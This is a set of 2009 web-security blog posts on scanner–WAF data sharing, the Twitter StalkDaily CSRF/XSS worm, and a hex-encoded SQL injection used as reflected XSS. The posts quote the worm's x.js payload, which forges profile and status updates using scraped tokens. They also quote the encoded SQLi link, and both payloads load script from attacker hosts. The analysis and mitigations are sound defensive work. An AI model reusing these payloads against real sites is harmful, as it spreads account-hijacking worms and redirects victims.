Monday, April 27, 2009

Scanner and WAF Data Sharing

Submitted by Ryan Barnett 04/27/2009

The concept of a web application vulnerability scanner exporting data that is then imported into a web application firewall (WAF) for targeted remediation is not new. In a previous post, I outlined one example of this VA -> WAF data sharing concept, where the WhiteHat Sentinel service will auto-generate ModSecurity virtual patching rules for specific identified issues. While this concept is certainly attractive for demonstrating risk reduction, it is important to realize that you are not constrained to a "one way" data flow. WAFs have access to a tremendous amount of information that they can share with vulnerability scanners in order to make them more effective. VA + WAF should ideally be a symbiotic relationship. Here are a few examples:

When to scan?
Have you ever asked a vulnerability scanning team for the rationale behind their scanning schedule? If not, you might want to, as the responses can be either illuminating or absolutely frustrating. Unfortunately, most scanning schedules are driven by arbitrary dates chosen to meet minimum requirements (such as quarterly scanning mandated by a parent organization). Most scanning is scheduled when it is convenient for the scanning team and is not tailored around any actual intelligence about the target application. Ideally, scanning schedules should be driven by the organization's change control processes.

The issue seems to be that scanning leverages the change control process only once, when it is run as a security gate before an application is initially deployed to production. From then on, for some reason, it is set to some arbitrary time interval (once per week, etc.). This scanning is conducted whether or not anything has actually changed within the application. Why is this happening? When discussing this issue with scanning personnel, the overwhelming response is that they scan at set intervals because they lack visibility into when an application has actually changed. There is no coordination between the InfoSec/Ops teams to initiate scanning when the app changes, so they are left scanning at short intervals in order to be safe.

So, knowing "when to scan" is important. A WAF has a unique positional view of the web application as it is up 24x7 monitoring the traffic. This is in contrast to scanners who take snapshot views of the application when they run. Top tier WAFs are able to profile the web application and identify when the application legitimately changes. In these scenarios, it is a simple matter of setting the appropriate policy actions in order to send out emails to notify the vulnerability scanning staff to immediately initiate a new scan.

What to scan?
This is a scenario similar to the one above. Try asking the vulnerability scanning team about their rationale for how they choose "what" to scan. Again, the overwhelming response is that they enumerate and scan everything because they have no insight into what has changed in the target application. Understand that there may be reasons for scanning even when the application hasn't changed (such as when a new vulnerability identification check has been created); however, this tactic normally results in needless scanning of resources that have not changed.

Similar to the capability outlined in the previous section, a good WAF can not only alert you when an application has changed, but also outline exactly which resources have changed. Imagine for a moment that you are in charge of running the scanning processes, and that you received an email as soon as a web resource was deployed or updated, outlining exactly which resources needed to be scanned. That would not only shorten the time to identify a vulnerability, but also significantly reduce the overall scanning time, resulting in a more targeted scan.
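
A sketch of the consuming side (assuming the WAF exports the changed resources as a flat text file - the file location and the "scanner-cli" command are stand-ins for whatever your tools actually provide):

# targeted_scan.py - hypothetical: read the WAF's list of changed
# resources and hand only those URLs to the scanner, rather than
# re-enumerating the entire application.
import subprocess

BASE_URL = "https://app.example.com"             # assumption
CHANGED_LIST = "/var/waf/changed_resources.txt"  # assumption: WAF export

with open(CHANGED_LIST) as f:
    targets = [BASE_URL + path.strip() for path in f if path.strip()]

for url in targets:
    # "scanner-cli" stands in for the scan tool your team actually uses.
    subprocess.run(["scanner-cli", "--url", url], check=True)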

Scanning Coverage
Another challenge for scanning tools is application coverage. Here is another question to ask your vulnerability scanning team - what percentage of the web application do you enumerate during your scans? Answering this question is tricky, as it is extremely difficult to accurately gauge a percentage given scanning challenges and the dynamic nature of web applications. The bottom line is that if the scanner cannot effectively spider/crawl/index all of the resources, then it obviously cannot conduct vulnerability analysis on them.

The issue of application coverage is another area where WAFs can help scanners. Top WAFs are able to export their learned SITE tree so that scanning teams can use it to reconcile resources. This results not only in greater coverage but, once again, in a shorter overall scanning process, as the crawling phase may be significantly reduced and in some cases skipped altogether.
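
The reconciliation itself can be simple; a sketch, assuming both the WAF's SITE tree and the scanner's crawl results can be exported as flat URL lists (the file names here are hypothetical):

# coverage_check.py - hypothetical: compare the WAF's learned SITE tree
# against what the scanner's crawler actually discovered.
waf_tree = set(open("waf_site_tree.txt").read().split())
scanned = set(open("scanner_crawl.txt").read().split())

missed = waf_tree - scanned
coverage = 100.0 * len(waf_tree & scanned) / max(len(waf_tree), 1)

print("Scanner coverage: %.1f%% of %d known resources" % (coverage, len(waf_tree)))
for url in sorted(missed):
    print("Not crawled - seed the scanner with:", url)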

Data sharing between vulnerability scanners and web application firewalls is vitally important for web application remediation efforts. Hopefully this post has helped to demonstrate that the information passing between these tools/processes is not just one-way but bi-directional. Each one has its own unique perspective on the target application and can provide data to the other that it couldn't necessarily obtain on its own. I believe that the integration of VA+WAF is only going to increase as we move forward.

Monday, April 13, 2009

Twitter Worm - Cross-site Request Forgery Attacks

Submitted by Ryan Barnett 04/13/2009

In case you were too busy hunting for Easter eggs this past weekend, you may have missed the fact that Twitter was hit with Cross-site Request Forgery worm attacks. Many news outlets are labeling these as Cross-site Scripting attacks, which is true; however, Cross-site Request Forgery is more accurate. Let's look at these definitions:

Cross-site Scripting "occurs whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc." This definition does hold true for the Twitter worms as the malicious payload was sent to user's browsers and it would execute.

Cross-site Request Forgery "attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks." This definition is more accurate as the malicious javascript payload is forcing a logged in Twitter user to update their profile to include the worm javascript. The fact that the javascript code is leveraging the user's session token data to send an unintential request back to the application is the essence of a CSRF attack.

In my previous post I mentioned how it was difficult to neatly place attacks into just one category. Was this an XSS attack or a CSRF attack? In actuality it was both. These worm attacks leveraged a lack of proper output encoding to launch an XSS attack; however, the payload itself was CSRF.

The attacks targeted the "profile" component of Twitter user accounts and injected javascript similar to the following:

<a href="http://www.stalkdaily.com"/><script src="hxxp://mikeyylolz.uuuq.com/x.js">

The "<script>" data is what was getting injected into people’s profiles. Taking a quick look at the "x.js" script, we see the following:

var update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! :)");
var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");
var ajaxConn1 = new XHConn(); // restored: ajaxConn1 is used below but its declaration was dropped from the quoted snippet
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");

The CSRF code uses AJAX calls to stealthily send the requests to Twitter without the user's knowledge. It issues a POST to the "/status/update" page to send the spam tweet, and a POST to "/account/settings" to modify the "user[url]" data. Also important to note - Twitter was using a CSRF token (called authenticity_token) to help prevent these types of attacks. This is a perfect example of why, if your web application has XSS vulnerabilities, a CSRF token is useless against local attacks. As you can see in the payload above, the XSS AJAX code simply scrapes the authenticity_token data from within the browser and sends it along with the attack payload.

The Cortesi blog has an excellent technical write-up of what is happening -

What’s happening here is that it looks like somebody realized they could save url encoded data to the profile URL field that would not be properly escaped when re-displayed. This is particularly nasty because you could get infected simply by viewing somebody’s profile page on Twitter that was already infected. If you visited an infected profile, the JavaScript in the profile would execute and by doing so tweet the mis-leading link, and update your profile with the same malicious JavaScript thereby infecting anybody that then visits your profile on twitter.com.

Defenses/Mitigations - Users
Use the NoScript plugin for Firefox, as it lets you pick and choose when/where/what javascript you want to allow to run.

Defenses/Mitigations - Web Apps
Disallowing clients from submitting any html code is manageable; however, you still need to canonicalize the data before applying any of your filters. If done properly, you can simply look for html/scripting tags and data and disallow them entirely. What is challenging is when you must allow your clients to submit html code but want to disallow malicious code. Wiki sites, blogs and social media sites such as Twitter have to allow their clients some ability to upload html data. For situations such as this, applications such as the OWASP AntiSamy package or HTMLPurifier are excellent choices.
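
Both of those packages work from an allow-list of permitted markup. As a toy illustration of that idea (this is not AntiSamy's or HTMLPurifier's actual API, just the concept in a few lines of Python):

# allowlist_filter.py - toy allow-list HTML filter: parse the markup and
# keep only explicitly permitted tags, dropping everything else,
# including <script> tags and all attributes.
from html.parser import HTMLParser
from html import escape

ALLOWED_TAGS = {"b", "i", "p", "br"}  # assumption: the site's policy

class AllowListFilter(HTMLParser):
    def __init__(self):
        super().__init__()
        self.out = []
    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append("<%s>" % tag)  # attributes deliberately dropped
    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append("</%s>" % tag)
    def handle_data(self, data):
        self.out.append(escape(data))

f = AllowListFilter()
f.feed('<b>hi</b><script src="http://mikeyylolz.uuuq.com/x.js"></script>')
print("".join(f.out))  # -> <b>hi</b>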

Although allowing some level of basic html code is understandable, adding in scripting code is different. One aspect of monitoring that can be done (by a web application firewall) is to monitor and track the use of scripting code per resource. By tracking this type of meta-data, you could identify if *any* scripting code suddenly appears on a page (when previously there was none) or if there were, say, 2 "<script>" tags on a page and now there are 3. This would indicate some sort of application change. Once alerted to this, the next question is - was this a legitimate change or something malicious? If Twitter had been using this type of monitoring, they would have been alerted as soon as "Victim Zero" (in this case, the worm originator) altered his profile URL to include the encoded javascript data.
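
A minimal sketch of that kind of meta-data tracking (assuming the monitor can see response bodies; the baseline storage format here is hypothetical):

# script_watch.py - hypothetical monitor: count <script> tags per
# resource and alert when the count deviates from the stored baseline.
import json, os, re

BASELINE_FILE = "script_baseline.json"  # assumption: local state file
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)

def check(resource, response_body):
    baseline = {}
    if os.path.exists(BASELINE_FILE):
        with open(BASELINE_FILE) as f:
            baseline = json.load(f)
    count = len(SCRIPT_TAG.findall(response_body))
    known = baseline.get(resource)
    if known is not None and count != known:
        print("ALERT: %s went from %d to %d script tags" % (resource, known, count))
    baseline[resource] = count  # sketch: auto-update the baseline after alerting
    with open(BASELINE_FILE, "w") as f:
        json.dump(baseline, f)

check("/profile/victim_zero", '<html><script src="x.js"></script></html>')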

Monday, April 6, 2009

Blended Attacks: Reflected XSS Attack via SQL Injection

Submitted by Ryan Barnett 04/06/2009

More and more of today's web application attacks leverage multiple weaknesses/vulnerabilities or attacks in order to achieve the desired exploitation outcome. It is becoming more and more difficult to neatly place an attack into one specific container (such as XSS, SQL Injection, etc.), as attacks increasingly combine many issues together.

One great example of this that I recently ran into was an attack scenario posted to the SANS Advisory Board mailing list. The user had set up some Google Alerts to monitor his public facing web site. He didn't specify the details; however, it is assumed that he was attempting to monitor for traditional Google Hacking information leakage types of problems. In this particular case, the user received a Google Alert email with an odd looking link pointing to a resource on one of his sites. The link looked as follows -

<a style=3D"color: blue" href=3D"http://munge.munge.edu/new_skills/workshop/info.php?
wid=3D0+union+select+0x3c736372697074207372633d22687474=703a2f2f
747261662e696e2f632e706870223e3c2f7363726970743e,0x506f726e20747
261=696c657273,0,0,0x416d61746575722073657820766964656f73/*">
Workshops</a><br>

At first glance, it is easy to see that if the user clicks on this link, it will send an SQL Injection attack (based on the union and select keywords and formatting) aimed at the "wid" parameter of the "info.php" web page. What isn't so apparent is the data being extracted from the database. The union/select command combination is normally used by attackers to extract data from a DB; however, this SQL query does not specify any tables or columns. The user described that if the link was actually clicked (which was a bad idea, as it actually launched the attack), he would be redirected to some porn sites.

So what is happening here?

The data within the SQL Injection query payload is actually Hex encoded. If you decode it, you will see the following -

<script src="http://traf.in/c.php"></script>,Porntrailers,0,0,Amateur sex videos/

This javascript instructs the user's browser to fetch the c.php script from the traf.in website. If you access this page, it runs some obfuscated javascript which redirects the user to http://traf.in/in.cgi?18, where the number passed to the in.cgi script selects a different destination porn site.

The ultimate goal with this attack is to force users to visit these porn sites. The methodology used is -

  1. Attacker identifies a website that has an SQL Injection vulnerability.
  2. They then place web links, containing the SQL Injection payload targeting the vulnerable site, on other web sites.
  3. Googlebot then crawls the attacker's sites and indexes the attack web link.
  4. Anyone running a Google search (or, in this case, anyone with a matching Google Alert set up) will receive this malicious link.
  5. If they click on the link, they will launch an SQL Injection attack against the website.
  6. If the SQL Injection is successful, the database will Hex decode the malicious javascript payload and present the data back to the user in the html page.
  7. The user will then be redirected to a porn site.

So, while SQL Injection was used in this attack, it was merely a means to an end. It served as the Reflected XSS vector: the database transformed the malicious javascript payload from Hex and sent it on to the user. This is rather interesting as an evasion mechanism, as both Google and the target website may have basic XSS input validation blacklists in place, and this payload might bypass them.
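
To see why, compare a naive blacklist check against one that decodes hex literals first (a toy demonstration - the filtering logic here is hypothetical, not any site's actual filter):

# evasion_demo.py - a literal "<script" blacklist misses this payload
# because the script tag only exists after the database hex-decodes it.
import re

attack = ("wid=0 union select 0x3c736372697074207372633d22687474703a2f2f"
          "747261662e696e2f632e706870223e3c2f7363726970743e,0,0,0,0/*")

print("naive filter hit:", "<script" in attack.lower())  # False - bypassed

# Decoding any 0x... literals first exposes the hidden markup.
decoded = [bytes.fromhex(h).decode("ascii", "replace")
           for h in re.findall(r"0x([0-9a-fA-F]+)", attack)]
print("after decoding:", any("<script" in d.lower() for d in decoded))  # True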

The concept of using SQL Injection as an XSS mechanism to distribute malicious code started with the Mass SQL Injection Bots (Stored XSS, as opposed to the Reflected XSS in this case) and appears to be continuing as the bad guys figure out more and more ways to monetize it.